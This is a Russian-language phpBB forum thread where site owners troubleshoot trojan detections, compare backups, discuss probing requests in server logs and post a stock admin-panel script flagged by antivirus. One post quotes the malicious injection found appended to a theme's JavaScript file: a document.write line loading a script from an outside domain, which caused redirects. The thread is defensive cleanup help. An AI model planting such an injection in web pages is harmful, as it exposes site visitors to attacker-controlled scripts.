Как убить Трояна?

[AdmninsCluba]

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

[angst66]

Вспомнив точно, когда я видел в телефоне нормальный сайт, скачал бэкап и сравнил его со вчерашней версией. Как я и предполагал (много почитав в интернетах), что скорее всего нужно искать в js файлах. Нашлось несовпадение в папке шабона одного из стилей. Вот код, который прописался в самом конце

Код: Выделить всё

<!-- js-tools -->
document.write('<script type="text/javascript" src="http://mlvjs19.org/?acc=12242&waponly=opt&zona=0&landing=xcust"></script>');
<!-- /js-tools -->

Все почистил, пароли поменяны, редиректа больше нет.

[Пчелкин]

Может вопрос не к месту...Но тем не менее...в логах хостера наблюдаются вот такие запросы к несуществующим файлам...Что это и откуда могет быть?

"12645" [Fri Oct 25 23:56:16 2013] [error] [client 110.87.141.50] script not found or unable to stat: /www/caldinac/www/htdocs/signup.php
"12645" [Fri Oct 25 23:56:28 2013] [error] [client 110.87.141.50] script not found or unable to stat: /www/caldinac/www/htdocs/signup.php
"12645" [Fri Oct 25 23:56:36 2013] [error] [client 110.87.141.50] script not found or unable to stat: /www/caldinac/www/htdocs/register.php
"12645" [Fri Oct 25 23:57:06 2013] [error] [client 110.87.141.50] script not found or unable to stat: /www/caldinac/www/htdocs/profile.php
"12645" [Sat Oct 26 00:01:25 2013] [error] [client 66.249.75.206] script not found or unable to stat: /www/caldinac/www/htdocs/go.php
"12645" [Sat Oct 26 00:34:47 2013] [error] [client 178.137.91.234] script not found or unable to stat: /www/caldinac/www/htdocs/admin.php

Там таких файлов в корне никак не может быть...

[Anvar]

За-то у 2.0.23 могут быть эти файлы. Стоял когда-нибудь такой?

[владимир1983]

Боты. Не обращай внимания.

[xisp]

Может вопрос не к месту...Но тем не менее...в логах хостера наблюдаются вот такие запросы к несуществующим файлам...Что это и откуда могет быть?

Обычные школьники с обычными скриптами пытаются найти доступ в админку. Не стоит обращать внимания.

[Пчелкин]

Да...этот форум был переведен с двойки...

Боты. Не обращай внимания.

Типа у них запросы на такие старые весчи делаются? афигеть...Просщупывают или не имеют автоопределения куда попали и как?

[Anvar]

Создай эти файлы и редиректи в чат, а там спроси - "чего надобно старче?" :-D

[xisp]

Просщупывают или не имеют автоопределения куда попали и как?

Зачем? Проще спамить всеми возможными вариантами. Быстрее выходит.

[c61]

Пчелкин, немного не по теме, но как параноик со стажем замечу, что у Вас на фотовидефоруме открыт каталог стилей (тырь - не хочу) и в php.ini включен expose_php (есть пасхалки и прочее), что позволяет идентифицировать версии используемого ПО. Остальные мелочи несущественны))

[Пчелкин]

открыт каталог стилей

А вот с этого места подробней
(а Вас, Штирлиц. я попрошу остаться(с))
Разговор был не про мой форум...про чужой.....

Добавлено спустя 1 минуту 58 секунд:

Создай эти файлы и редиректи в чат, а там спроси - "чего надобно старче?"

Идея прикольная, но у них нет чата...хотя мысль подхватил...

[Anvar]

c61, спасибо, пошел стили Пчелкина качать, а то все откладывал в дальний ящик :-D

[Пчелкин]

Ну ну...побейся аб стену.... гы...

[Regal]

добрый день!

Установил phpbb 3.0.12. После установки не могу зайти в админку, не пускает касперский, говорит что объект заражен HEUR:Trojan.Script.Generic. причем сам форум работает.

Комп проверил на вирусы - чисто!
Паменял все пароли - не помогло!
Подозрительных ссылок на другие ресурсы в коде нет! проверил!
Никакой переадресации нет!
файлы Index.* все чистые с бэкапа!

Помогите, что сделать?? как исправить?

[Regal]

нашел, что каспер ругается на следующий скрипт, который прописан в файле phpBB3\adm\style\overall_header.html

скрипт 

<script type="text/javascript">
// <![CDATA[
var jump_page = '{LA_JUMP_PAGE}:';
var on_page = '{ON_PAGE}';
var per_page = '{PER_PAGE}';
var base_url = '{A_BASE_URL}';

var menu_state = 'shown';


/**
* Jump to page
*/
function jumpto()
{
var page = prompt(jump_page, on_page);

if (page !== null && !isNaN(page) && page == Math.floor(page) && page > 0)
{
if (base_url.indexOf('?') == -1)
{
document.location.href = base_url + '?start=' + ((page - 1) * per_page);
}
else
{
document.location.href = base_url.replace(/&/g, '&') + '&start=' + ((page - 1) * per_page);
}
}
}

/**
* Set display of page element
* s[-1,0,1] = hide,toggle display,show
*/
function dE(n, s, type)
{
if (!type)
{
type = 'block';
}

var e = document.getElementById(n);
if (!s)
{
s = (e.style.display == '') ? -1 : 1;
}
e.style.display = (s == 1) ? type : 'none';
}

/**
* Mark/unmark checkboxes
* id = ID of parent container, name = name prefix, state = state [true/false]
*/
function marklist(id, name, state)
{
var parent = document.getElementById(id);
if (!parent)
{
eval('parent = document.' + id);
}

if (!parent)
{
return;
}

var rb = parent.getElementsByTagName('input');

for (var r = 0; r < rb.length; r++)
{
if (rb[r].name.substr(0, name.length) == name)
{
rb[r].checked = state;
}
}
}

/**
* Find a member
*/
function find_username(url)
{
popup(url, 760, 570, '_usersearch');
return false;
}

/**
* Window popup
*/
function popup(url, width, height, name)
{
if (!name)
{
name = '_popup';
}

window.open(url.replace(/&/g, '&'), name, 'height=' + height + ',resizable=yes,scrollbars=yes, width=' + width);
return false;
}

/**
* Hiding/Showing the side menu
*/
function switch_menu()
{
var menu = document.getElementById('menu');
var main = document.getElementById('main');
var toggle = document.getElementById('toggle');
var handle = document.getElementById('toggle-handle');

switch (menu_state)
{
// hide
case 'shown':
main.style.width = '93%';
menu_state = 'hidden';
menu.style.display = 'none';
toggle.style.width = '20px';
handle.style.backgroundImage = 'url(images/toggle.gif)';
handle.style.backgroundRepeat = 'no-repeat';

<!-- IF S_CONTENT_DIRECTION eq 'rtl' -->
handle.style.backgroundPosition = '0% 50%';
toggle.style.left = '96%';
<!-- ELSE -->
handle.style.backgroundPosition = '100% 50%';
toggle.style.left = '0';
<!-- ENDIF -->
break;

// show
case 'hidden':
main.style.width = '76%';
menu_state = 'shown';
menu.style.display = 'block';
toggle.style.width = '5%';
handle.style.backgroundImage = 'url(images/toggle.gif)';
handle.style.backgroundRepeat = 'no-repeat';

<!-- IF S_CONTENT_DIRECTION eq 'rtl' -->
handle.style.backgroundPosition = '100% 50%';
toggle.style.left = '75%';
<!-- ELSE -->
handle.style.backgroundPosition = '0% 50%';
toggle.style.left = '15%';
<!-- ENDIF -->
break;
}
}

// ]]>
</script>

после его удаления в админку пускает касперский.

Что это за подозрительный скрипт???? и что он делает?

[Pazh]

Regal скорее не на это , а на то что ты передаешь в одну из переменных из фигурных скобок

Код: Выделить всё

var jump_page = '{LA_JUMP_PAGE}:';
var on_page = '{ON_PAGE}';
var per_page = '{PER_PAGE}';
var base_url = '{A_BASE_URL}';